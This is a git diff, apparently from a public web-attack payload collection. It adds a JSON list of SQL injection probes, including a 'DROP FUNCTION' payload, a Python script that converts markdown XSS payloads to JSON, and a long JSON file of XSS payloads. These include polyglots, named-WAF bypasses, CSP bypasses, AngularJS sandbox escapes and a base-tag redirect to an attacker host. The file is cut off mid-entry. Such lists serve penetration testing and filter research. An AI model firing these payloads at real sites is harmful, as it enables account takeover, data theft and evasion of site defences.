"basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 25", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 26", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 27", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 28", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 29", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 30", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 31337", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "%' AND 8310=8310 AND '%'='", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "%' AND 8310=8311 AND '%'='", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,1,1))='X'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,1,1))='M'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,2,1))='i'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,2,1))='y'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,3,1))='c'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,3,1))='S'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,3,1))='X'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + } +] \ No newline at end of file diff --git a/XSS Injection/convert_to_json.py b/XSS Injection/convert_to_json.py new file mode 100644 index 00000000..543106f1 --- /dev/null +++ b/XSS Injection/convert_to_json.py @@ -0,0 +1,278 @@ +#!/usr/bin/env python3 +""" +Script to convert XSS payloads from markdown files to JSON format +""" + +import json +import re +from pathlib import Path +from typing import List, Dict, Any + + +def is_valid_xss_payload(line: str) -> bool: + """Check if a line is a valid XSS payload""" + # Skip empty lines, comments, and documentation + if not line or line.startswith('//') or line.startswith('#') or line.startswith('/*'): + return False + + # Skip lines that are clearly documentation + if line.startswith('-') or line.startswith('*') or line.startswith('['): + return False + + # Skip lines that contain common documentation words + doc_words = ['you can', 'this is', 'codename:', 'example:', 'note:', 'payload replacing', + 'simple script', 'for this reason', 'better to use', 'allows you', + 'one-line http', 'can be used', 'requirements:', 'payload:', 'source:'] + if any(word in line.lower() for word in doc_words): + return False + + # Skip lines that are just sentences/descriptions (contain spaces and common words) + common_words = ['the', 'is', 'are', 'was', 'were', 'been', 'being', 'have', 'has', 'had', + 'do', 'does', 'did', 'will', 'would', 'should', 'can', 'could', 'may', + 'might', 'must', 'shall', 'a', 'an', 'and', 'or', 'but', 'if', 'because', + 'as', 'until', 'while', 'of', 'at', 'by', 'for', 'with', 'about', 'against', + 'between', 'into', 'through', 'during', 'before', 'after', 'above', 'below'] + + word_count = sum(1 for word in common_words if ' ' + word + ' ' in ' ' + line.lower() + ' ') + if word_count >= 3: # If it contains 3 or more common words, likely a sentence + return False + + # Skip http/https links that are not part of payloads + if line.startswith('http') and '<' not in line and 'javascript:' not in line.lower(): + return False + + # Skip lines that look like version numbers or identifiers + if line.count('.') >= 2 and line.count('<') == 0: + return False + + # Must contain at least one XSS indicator + xss_indicators = [ + '<', '>', 'javascript:', 'onerror', 'onload', 'onclick', + 'alert', 'prompt', 'confirm', 'eval', 'script', 'svg', + 'img', 'iframe', 'body', 'div', 'data:', 'vbscript:' + ] + + has_indicator = any(indicator in line.lower() for indicator in xss_indicators) + + # Additional check: if line has < or >, it's more likely to be a payload + has_html_chars = '<' in line or '>' in line + + # If it has HTML characters, be more lenient + if has_html_chars: + return True + + # Otherwise, be more strict + return has_indicator and '(' in line # Likely contains function call + + +def extract_payloads_from_code_block(code_block: str, section_name: str) -> List[Dict[str, Any]]: + """Extract individual payloads from a code block""" + payloads = [] + lines = code_block.strip().split('\n') + + for line in lines: + line = line.strip() + + # Validate if this is a real XSS payload + if not is_valid_xss_payload(line): + continue + + # Determine type and context based on the payload + payload_type = determine_type(line, section_name) + context = determine_context(line) + severity = determine_severity(line) + + payload_obj = { + "payload": line, + "category": "xss", + "metadata": { + "type": payload_type, + "context": context, + "severity": severity, + "source": section_name + } + } + payloads.append(payload_obj) + + return payloads + + +def determine_type(payload: str, section: str) -> str: + """Determine the type of XSS payload""" + payload_lower = payload.lower() + + if 'polyglot' in section.lower(): + return 'polyglot' + elif 'bypass' in section.lower(): + return 'bypass' + elif ' str: + """Determine the context where the payload works""" + payload_lower = payload.lower() + + if 'href=' in payload_lower or 'src=' in payload_lower: + return 'attribute' + elif 'javascript:' in payload_lower: + return 'href' + elif ' str: + """Determine the severity of the payload""" + payload_lower = payload.lower() + + # Critical if it can steal cookies or sensitive data + if 'document.cookie' in payload_lower or 'fetch' in payload_lower: + return 'critical' + # High for most XSS payloads + elif 'alert' in payload_lower or 'prompt' in payload_lower or 'confirm' in payload_lower: + return 'high' + # Medium for potential XSS + else: + return 'medium' + + +def parse_markdown_file(file_path: Path) -> List[Dict[str, Any]]: + """Parse a markdown file and extract all payloads""" + all_payloads = [] + + with open(file_path, 'r', encoding='utf-8') as f: + content = f.read() + + # Extract code blocks + code_block_pattern = r'```(?:javascript|html|js|xml|svg|csharp|ps1)?\n(.*?)```' + matches = re.findall(code_block_pattern, content, re.DOTALL) + + # Extract section headers for context + current_section = file_path.stem + + # Find section headers + section_pattern = r'^#+\s+(.+)$' + sections = re.findall(section_pattern, content, re.MULTILINE) + + # Process code blocks + for i, code_block in enumerate(matches): + # Try to find the section this code block belongs to + section_name = current_section + if i < len(sections): + section_name = sections[i] if i < len(sections) else current_section + + payloads = extract_payloads_from_code_block(code_block, section_name) + all_payloads.extend(payloads) + + return all_payloads + + +def parse_text_file(file_path: Path) -> List[Dict[str, Any]]: + """Parse a text file containing raw payloads""" + all_payloads = [] + + with open(file_path, 'r', encoding='utf-8', errors='ignore') as f: + lines = f.readlines() + + for line in lines: + line = line.strip() + + # Validate if this is a real XSS payload + if not is_valid_xss_payload(line): + continue + + payload_type = determine_type(line, file_path.stem) + context = determine_context(line) + severity = determine_severity(line) + + payload_obj = { + "payload": line, + "category": "xss", + "metadata": { + "type": payload_type, + "context": context, + "severity": severity, + "source": file_path.stem + } + } + all_payloads.append(payload_obj) + + return all_payloads + + +def main(): + """Main function to convert all XSS payloads to JSON""" + base_dir = Path(__file__).parent + output_file = base_dir / 'xss_payloads.json' + + all_payloads = [] + + # Process markdown files + md_files = [ + 'README.md', + '1 - XSS Filter Bypass.md', + '2 - XSS Polyglot.md', + '3 - XSS Common WAF Bypass.md', + '4 - CSP Bypass.md', + '5 - XSS in Angular.md' + ] + + for md_file in md_files: + file_path = base_dir / md_file + if file_path.exists(): + print(f"Processing {md_file}...") + payloads = parse_markdown_file(file_path) + all_payloads.extend(payloads) + print(f" Found {len(payloads)} payloads") + + # Process Intruders folder + intruders_dir = base_dir / 'Intruders' + if intruders_dir.exists(): + for txt_file in intruders_dir.glob('*.txt'): + print(f"Processing {txt_file.name}...") + payloads = parse_text_file(txt_file) + all_payloads.extend(payloads) + print(f" Found {len(payloads)} payloads") + + # Remove duplicates while preserving order + seen = set() + unique_payloads = [] + for payload in all_payloads: + payload_str = payload['payload'] + if payload_str not in seen: + seen.add(payload_str) + unique_payloads.append(payload) + + # Write to JSON file + with open(output_file, 'w', encoding='utf-8') as f: + json.dump(unique_payloads, f, indent=2, ensure_ascii=False) + + print(f"\nTotal payloads: {len(all_payloads)}") + print(f"Unique payloads: {len(unique_payloads)}") + print(f"Output saved to: {output_file}") + + +if __name__ == '__main__': + main() diff --git a/XSS Injection/xss_payloads.json b/XSS Injection/xss_payloads.json new file mode 100644 index 00000000..8c5fc51c --- /dev/null +++ b/XSS Injection/xss_payloads.json @@ -0,0 +1,18652 @@ +[ + { + "payload": "", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "critical", + "source": "Cross Site Scripting" + } + }, + { + "payload": "", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "Cross Site Scripting" + } + }, + { + "payload": "", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "critical", + "source": "Cross Site Scripting" + } + }, + { + "payload": "", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "Cross Site Scripting" + } + }, + { + "payload": "SVG 1.x (xlink:href)", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "XSS in Files" + } + }, + { + "payload": "", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "script_tag", + "severity": "high", + "source": "XSS Filter Bypass" + } + }, + { + "payload": "", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "script_tag", + "severity": "high", + "source": "XSS Filter Bypass" + } + }, + { + "payload": "\\x3csVg/\\x3e", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "Polyglot XSS" + } + }, + { + "payload": "\">>\" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->\" ></script><script>alert(1)</script>\"><img/id=\"confirm&lpar; 1)\"/alt=\"/\"src=\"/\"onerror=eval(id&%23x29;>'\"><img src=\"http: //i.imgur.com/P8mL8.jpg\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "References" + } + }, + { + "payload": "\" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "event_attribute", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//\";alert(String.fromCharCode (88,83,83))//\";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "script_tag", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "script_tag", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "event_attribute", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "'\">><marquee><img src=x onerror=confirm(1)></marquee>\"></plaintext\\></|\\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->\"></script><script>alert(1)</script>\"><img/id=\"confirm&lpar;1)\"/alt=\"/\"src=\"/\"onerror=eval(id&%23x29;>'\"><img src=\"http://i.imgur.com/P8mL8.jpg\">", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "attribute", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "javascript://'/</title></style></textarea></script>--><p\" onclick=alert()//>*/alert()/*", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "javascript://--></script></title></style>\"/</textarea>*/<alert()/*' onclick=alert()//>a", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "javascript://</title>\"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "javascript://</title></style></textarea>--></script><a\"//' onclick=alert()//>*/alert()/*", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "javascript://'//\" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "javascript://</title></textarea></style></script --><li '//\" '*/alert()/*', onclick=alert()//", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "javascript:alert()//--></script></textarea></style></title><a\"//' onclick=alert()//>*/alert()/*", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "/</title/'/</style/</script/</textarea/--><p\" onclick=alert()//>*/alert()/*", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "style", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "javascript://--></title></style></textarea></script><svg \"//' onclick=alert()//", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "/</title/'/</style/</script/--><p\" onclick=alert()//>*/alert()/*", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "style", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "<svg%0Ao%00nload=%09((pro\\u006dpt))()//", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "html", + "severity": "medium", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "javascript:\"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \\\" onmouseover=/*&lt;svg/*/onload=alert()//>", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "javascript:\"/*'/*`/*\\\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "javascript:\"/*\\\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "javascript:`//\"//\\\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "JavaScript://%250Aalert?.(1)//'/*\\'/*\"/*\\\"/*`/*\\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\\76-->", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "attribute", + "severity": "high", + "source": "2 - XSS Polyglot" + } + }, + { + "payload": "<svg/onrandom=random onload=confirm(1)>", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "event_attribute", + "severity": "high", + "source": "Common WAF Bypass" + } + }, + { + "payload": "<video onnull=null onmouseover=confirm(1)>", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "event_attribute", + "severity": "high", + "source": "Common WAF Bypass" + } + }, + { + "payload": "<svg/OnLoad=\"`${prompt``}`\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "Summary" + } + }, + { + "payload": "<svg/onload=%26nbsp;alert`bohdan`+", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "Cloudflare" + } + }, + { + "payload": "1'\"><img/src/onerror=.1|alert``>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "event_attribute", + "severity": "high", + "source": "Chrome Auditor" + } + }, + { + "payload": "<svg onload=prompt%26%230000000040document.domain)>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "Incapsula WAF" + } + }, + { + "payload": "<svg onload=prompt%26%23x000000028;document.domain)>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "Incapsula WAF" + } + }, + { + "payload": "xss'\"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "html", + "severity": "high", + "source": "Incapsula WAF" + } + }, + { + "payload": "<svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "medium", + "source": "Akamai WAF" + } + }, + { + "payload": "<a href=\"j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;\">X</a>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "WordFence WAF" + } + }, + { + "payload": "</script><svg><script>alert(1)-%26apos%3B", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "Fortiweb WAF" + } + }, + { + "payload": "<svg onload\\r\\n=$.globalEval(\"al\"+\"ert()\");>", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "event_attribute", + "severity": "medium", + "source": "3 - XSS Common WAF Bypass" + } + }, + { + "payload": "anythinglr00</script><script>alert(document.domain)</script>uxldz", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "script_tag", + "severity": "high", + "source": "3 - XSS Common WAF Bypass" + } + }, + { + "payload": "anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "html", + "severity": "high", + "source": "3 - XSS Common WAF Bypass" + } + }, + { + "payload": "<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "html", + "severity": "medium", + "source": "3 - XSS Common WAF Bypass" + } + }, + { + "payload": "?\"></script><base%20c%3D=href%3Dhttps:\\mysite>", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "html", + "severity": "medium", + "source": "3 - XSS Common WAF Bypass" + } + }, + { + "payload": "<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "event_attribute", + "severity": "high", + "source": "3 - XSS Common WAF Bypass" + } + }, + { + "payload": "<a href=javas&#99;ript:alert(1)>", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "attribute", + "severity": "high", + "source": "3 - XSS Common WAF Bypass" + } + }, + { + "payload": "\\u003e\\u003c\\u0068\\u0031 onclick=alert('1')\\u003e", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "event_attribute", + "severity": "high", + "source": "3 - XSS Common WAF Bypass" + } + }, + { + "payload": "<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>\"", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "attribute", + "severity": "high", + "source": "CSP Bypass" + } + }, + { + "payload": "script=document.createElement('script');", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "html", + "severity": "medium", + "source": "Bypass CSP using JSONP" + } + }, + { + "payload": "<script src=\"data:,alert(1)\">/</script>", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "attribute", + "severity": "high", + "source": "Bypass CSP default-src" + } + }, + { + "payload": "\"/><script>alert(1);</script>", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "script_tag", + "severity": "high", + "source": "Bypass CSP inline eval" + } + }, + { + "payload": "<base href=http://www.attacker.com>", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "attribute", + "severity": "medium", + "source": "Bypass CSP script-src self" + } + }, + { + "payload": "GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a&a&a&a", + "category": "xss", + "metadata": { + "type": "bypass", + "context": "script_tag", + "severity": "high", + "source": "Bypass CSP unsafe-inline" + } + }, + { + "payload": "{{constructor.constructor('alert(1)')()}}", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSS in Angular and AngularJS" + } + }, + { + "payload": "{{0[a='constructor'][a]('alert(1)')()}}", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "Client Side Template Injection" + } + }, + { + "payload": "{{$eval.constructor('alert(1)')()}}", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "Client Side Template Injection" + } + }, + { + "payload": "{{$on.constructor('alert(1)')()}}", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "Client Side Template Injection" + } + }, + { + "payload": "B=C(b,c,b);$evalAsync(\"", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "Stored/Reflected XSS" + } + }, + { + "payload": "$eval('x=alert(1)//');", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "References" + } + }, + { + "payload": "$eval('x=alert(1)//'); }}", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "'alert(1);'", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "$eval('a\",eval(`var _=document\\\\x2ecreateElement(\\'script\\');", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "document\\\\x2ebody\\\\x2eappendChild(_);`),\"')", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "var _ = document.createElement(\\'script\\');", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "$eval('a\",eval(`", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "var _=document\\\\x2ecreateElement(\\'script\\');", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "$eval('a,eval(`", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "document\\\\x2ebody\\\\x2eappendChild(_);`),a')", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "$eval('a,eval(`var _=document.createElement(\\'script\\');", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "<h4>An untrusted URL:</h4>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "<p><a class=\"e2e-dangerous-url\" [href]=\"dangerousUrl\">Click me</a></p>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "<h4>A trusted URL:</h4>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "<p><a class=\"e2e-trusted-url\" [href]=\"trustedUrl\">Click me</a></p>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "this.dangerousUrl = 'javascript:alert(\"Hi there\")';", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "5 - XSS in Angular" + } + }, + { + "payload": "?javascript:alert(1)\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?alert(1)\",", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?getURL(javascript:alert(1))\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?asfunction:getURL,javascript:alert(1)//\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?getURL,javascript:alert(1)\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?goto,javascript:alert(1)\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?clickTAG=javascript:alert(1)\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?url=javascript:alert(1)\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?clickTAG=javascript:alert(1)&TargetAS=\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?TargetAS=javascript:alert(1)\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?skinName=asfunction:getURL,javascript:alert(1)//\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?baseurl=asfunction:getURL,javascript:alert(1)//\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?base=javascript:alert(0)\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?onend=javascript:alert(1)//\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?userDefined=');function someFunction(a){}alert(1)//\",", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?URI=javascript:alert(1)\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": 